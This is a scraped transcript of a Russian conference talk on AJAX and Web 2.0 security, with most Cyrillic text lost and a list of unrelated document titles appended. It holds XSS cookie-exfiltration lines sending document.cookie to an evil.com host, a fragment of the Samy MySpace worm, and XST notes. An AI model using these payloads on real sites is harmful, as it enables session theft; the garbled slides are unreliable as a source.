безопасность ajax приложений александр капранов

If you can't read please download the document

Upload: webcrunch

Post on 28-May-2015

970 views

Category:

Technology

3 download

Report

Download

Embed Size (px):

TRANSCRIPT

1. AJAX
- - Web 2.0 Security

, [email_address] 2.

- .. AJAX?

- ().

- .. AJAX?

- ().

- 1 , 1 , 1 , 2 ;

- script kiddies.

90% - ( UK) ( NTA Monitor).

Google 2 phpBB.

CERT advisory XSS 02.02.2000, xss mail.li.ru 30 .

- code, SQL injection

. OWASP Top Ten 2007.

7. Sokr.Ru:

, , ,

8. http://myappsecurity.blogspot.com/ 9. Hey, Jacks

AJAX ().

AJAX .

XmlHttpRequest (Flash,

: vs. .

10. XSS (Cross Site Scripting)

s.cgi?q=

img1.src='evil.com?' + cookie;

(Carnaval, AttackAPI)

setTimeout loop + remote reqs JS- .com/control.cgi 11. 12. XSS

$text = q{a/;alert(42);/};

HTML- !

13. CSRF (X Site Request Forgery)

POST

14. CSRF

- JS

- JSON ( )

Gmail, 2006.

15. CSRF

: XmlHttpRequest * mhtml MSIE vuln = GET .

16. All your cookies are belong to us

img1.src = 'http://.com/' + document.cookie;

: httponly cookies.

: XST.

TRACE / HTTP/1.1 Cookies: XHR squid 17.

Click to Enter YOUR Bank!!

XSS+AJAX = JavaScript, URL!

18. 19. Javascript is the new shellcode

MySpace worm, samy is my hero, 2004

{var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var

OWASP 2007 . XSS shell & sql injections.

20.

OpenID .

XSS RSS.

UGC ( NetVibes).

client-side persistence (visited links, cache).

21.

Drive-by Pharming.

MySpace worm samy is my hero, .

22. ?

Александр Шишов (BotScanner)

РЕШЕНИЯ ДЛЯ E-HEALTH: Безопасность Инфраструктура … · РЕШЕНИЯ ДЛЯ e-health: - Безопасность - Инфраструктура

Безопасность WordPress

Безопасность интернет-приложений осень 2013 лекция 10

2. Безопасность zOS

Александр Краковецкий_Разработка универсальных приложений для Windows Phone 8.1 и Windows 8.1

Рынок мобильных приложений

Безопасность АСУ ТП

Безопасность дорожного движения › __data › assets › pdf_file › 0005 › ... · Безопасность дорожного движения Задача

Александр Белецкий "Архитектура Javascript приложений"

Softline: Информационная безопасность

Александр Вырыпаев, СМАРТС

Безопасность интернет-приложений осень 2013 лекция 7

ASUS Phone...10 Эксплуатация и безопасность Инструкция Безопасность на дороге. Мы настоятельно рекомендуем

БЕЗОПАСНОСТЬ ЛАЗЕРНОЙ АППАРАТУРЫ · iec/tr 60825-13— 2016 БЕЗОПАСНОСТЬ ЛАЗЕРНОЙ АППАРАТУРЫ Часть 13 Измерения

Безопасность контента

UICollectionView — Александр Зимин

Александр Белоцерковский (Microsoft)

Mobile Saturday. Тема 6. Особенности тестирования приложений на iOS (Александр Буратынский)

Безопасность презентация finish...БЕЗОПАСНОСТЬ НАШИХ ДЕТЕЙ В НАШИХ РУКАХ! Мы привыкли ассоциировать свой

Александр Кашеверов - Polymer

Безопасность электронного обучения

TravelMassive_Чорный Александр

АЛЕКСАНДР ГОРОДНИЦКИЙ

USG60/60W/40/40WŸреимущества Гарантированная безопасность Zyxel USG Performance Series обеспечивают безопасность класса

· 1 Безопасность 9 Электрическая безопасность

Web&CloudSecurity: Информационная безопасность веб-приложений и облачных технологий (10.04.01 Информационная

ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ ОУ.единыйурок.рф/images... · 2018-03-12 · безопасность, обеспечение здоровья

БЕзоПАсность › ru › files › default › News › 2019 › ... · 2019-06-18 · 36 ПЕРВАЯ МИЛЯ 4/2019 БЕзоПАсность БЕзоПАсность

александр де гиз

Разработка мобильных приложений

Безопасность интернет-приложений осень 2013 лекция 2

БЕЗОПАСНОСТЬ ДВИЖЕНИЯ АВТОМОБИЛЬНОГО ... · 2016-12-03 · ДОРОЖНОГО ДВИЖЕНИЯ Поскольку безопасность движения

Александр Кузнецов, VMware

Александр Белокрылов, Александр Мироненко. Java Embedded у вас дома